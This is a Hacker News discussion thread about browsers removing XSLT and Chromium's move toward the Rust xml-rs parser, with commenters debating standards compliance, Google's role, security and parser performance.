top | item 45955183

(no title)

nwellnhof | 3 months ago

Removing XSLT from browsers was long overdue and I'm saying that as ex-maintainer of libxslt who probably triggered (not caused) this removal. What's more interesting is that Chromium plans to switch to a Rust-based XML parser. Currently, they seem to favor xml-rs which only implements a subset of XML. So apparently, Google is willing to remove standards-compliant XML support as well. This is a lot more concerning.

discuss

order

xmcp123|3 months ago

It’s interesting to see the casual slide of Google towards almost internet explorer 5.1 style behavior, where standards can just be ignored “because market share”.

Having flashbacks of “<!--[if IE 6]> <script src="fix-ie6.js"></script> <![endif]-->”

granzymes|3 months ago

The standards body is deprecating XSLT with support from Mozilla and Safari (Mozilla first proposed the removal).

Not sure how you got from that to “Google is ignoring standards”.

Aurornis|3 months ago

I don’t get the comparison. The XSLT deprecation has support beyond Google.

waitwot|3 months ago

Interesting to watch technologists complain rather than engineer alternatives, ignore political activism.

otabdeveloper4|3 months ago

So-called "standards" on the Google (c) Internet (c) network are but a formality.

jillesvangurp|3 months ago

> This is a lot more concerning.

I'm not so sure that's problematic. Probably browser just aren't a great platform for doing a lot of XML processing at this point.

Preserving the half implemented frozen state of the early 2000s really doesn't really serve anyone except those maintaining legacy applications from that era. I can see why they are pulling out complex C++ code related to all this.

It's the natural conclusion of XHTML being sidelined in favor of HTML 5 about 15-20 years ago. The whole web service bubble, bloated namespace processing, and all the other complexity that came with that just has a lot of gnarly libraries associated with it. The world kind of has moved on since then.

From a security point of view it's probably a good idea to reduce the attack surface a bit by moving to a Rust based implementation. What use cases remain for XML parsing in a browser if XSLT support is removed? I guess some parsing from javascript. In which case you could argue that the usual solution in the JS world of using polyfills and e.g. wasm libraries might provide a valid/good enough alternative or migration path.

fithisux|3 months ago

They don't reduce complexity. They translate C++ (static complexity) to JS (dynamic complexity).

Also it is not complexity if XSLT lives in a third-party library with a well defined interface.

Thei problem is control. They gain control in 2 ways. They will get more involved in xml code base and the bad actors run in the JS sandbox.

That is why we have standards though. To relinquish control through interoperability.

svieira|3 months ago

> Removing XSLT from browsers was long overdue

> Google is willing to remove standards-compliant XML support as well.

> They're the same picture.

To spell it out, "if it's inconvenient, it goes", is something that the _owner_ does. The culture of the web was "the owners are those who run the web sites, the servants are the software that provides an entry point to the web (read or publish or both)". This kind of "well, it's dashed inconvenient to maintain a WASM layer for a dependency that is not safe to vendor any more as a C dependency" is not the kind of servant-oriented mentality that made the web great, not just as a platform to build on, but as a platform to emulate.

akerl_|3 months ago

Can you cite where this "servant-oriented" mentality is from? I don't recall a part of the web where browser developers were viewed as not having agency about what code they ship in their software.

Aurornis|3 months ago

> The culture of the web was "the owners are those who run the web sites, the servants are the software that provides an entry point to the web (read or publish or both)".

This is an attempt to rewrite history.

Early browser like NCSA Mosaic were never even released as Open Source Software.

Netscape Navigator made headlines by offering a free version for academic or non-profit use, but they wanted to charge as much as $99 (in 1995 dollars!) for the browser.

Microsoft got in trouble for bundling a web browser with their operating system.

The current world where we have true open source browser options like Chromium is probably closer to a true open web than what some people have retconned the early days of the web as being.

zetafunction|3 months ago

https://issues.chromium.org/issues/451401343 tracks work needed in the upstream xml-rs repository, so it seems like the team is working on addressing issues that would affect standards compliance.

Disclaimer: I work on Chrome and have occasionally dabbled in libxml2/libxslt in the past, but I'm not directly involved in any of the current work.

inejge|3 months ago

I hope they will also work on speeding it up a bit. I needed to go through 25-30 MB SAML metadata dumps, and an xml-rs pull parser took 3x more time than the equivalent in Python (using libxml2 internally, I think.) I rewrote it all with quick-xml and got a 7-8x speedup over Python, i.e., at least 20x over xml-rs.

Ygg2|3 months ago

Wait. They are going along with a XML parser that supports DOCTYPES? I get XSLT is ancient and full of exploits, but so is DOCTYPE. Literally poster boy for billion laughs attack (among other vectors).

zzo38computer|3 months ago

I think it might make more sense to use WebAssembly and make them as extensions which are included by default (many other things possibly should also be made as extensions rather than built-in functions). The same can be done for picture formats, etc. This would improve security while also improving the versatility (since you can replace parts of things), if the extension mechanism would have these capabilities.

(However, I also think that generally you should not require too many features, if it can be avoided, whether those features are JavaScripts, TLS, WebAssembly, CSS, and XSLT. However, they can be useful in many circumstances despite that.)

jjkaczor|3 months ago

Yeah, when I first heard about this a month or so ago, my thoughts were exactly this - a WebAssembly polyfil.

dietr1ch|3 months ago

> Currently, they seem to favor xml-rs which only implements a subset of XML.

Which seems to be a sane decision given the XML language allows for data blow-ups[^0]. I'm not sure what specific subset of XML `xml-rs` implements, but to me it seems insane to fully implement XML because of this.

[^0]: https://en.wikipedia.org/wiki/Billion_laughs_attack

_heimdall|3 months ago

Given that you have experience working on libxslt, why do you think they should have removed the spec entirely rather than improving the current implementation or moving towards modern XSLT 3?

fithisux|3 months ago

Why keep XSLT if the huge majority of devs use the HTML5+CSS+Javascript combo? Why pump money on a standard which will not be used?

Are XML technologies better or safer? Probably. However practice sets the standards. Is it a good thing? It remains to be seen.

Personally I am not satisfied with the "Web" experience. I find it unsafe, privacy disrespecting, slow and non-standards compliant.

cptskippy|3 months ago

> Currently, they seem to favor xml-rs which only implements a subset of XML.

What in particular do you find objectionable about this implementation? It's only claiming to be an XML parser, it isn't claiming to validate against a DTD or Schema.

The XML standard is very complex and broad, I would be surprised if anyone has implemented it in it's entirety beyond a company like Microsoft or Oracle. Even then I would question it.

At the end of the day, much of XML is hard if not impossible to use or maintain. A lot of it was defined without much thought given to practicality and for most developers they will never had to deal with a lot of it's eccentricities.

gnatolf|3 months ago

I was somewhat confused and irritated by the lack of a clear frontrunner crate for XML support in rust. I get that xml isn't sexy, but still.

James_K|3 months ago

What's long overdue is them updating to a modern version of XSLT.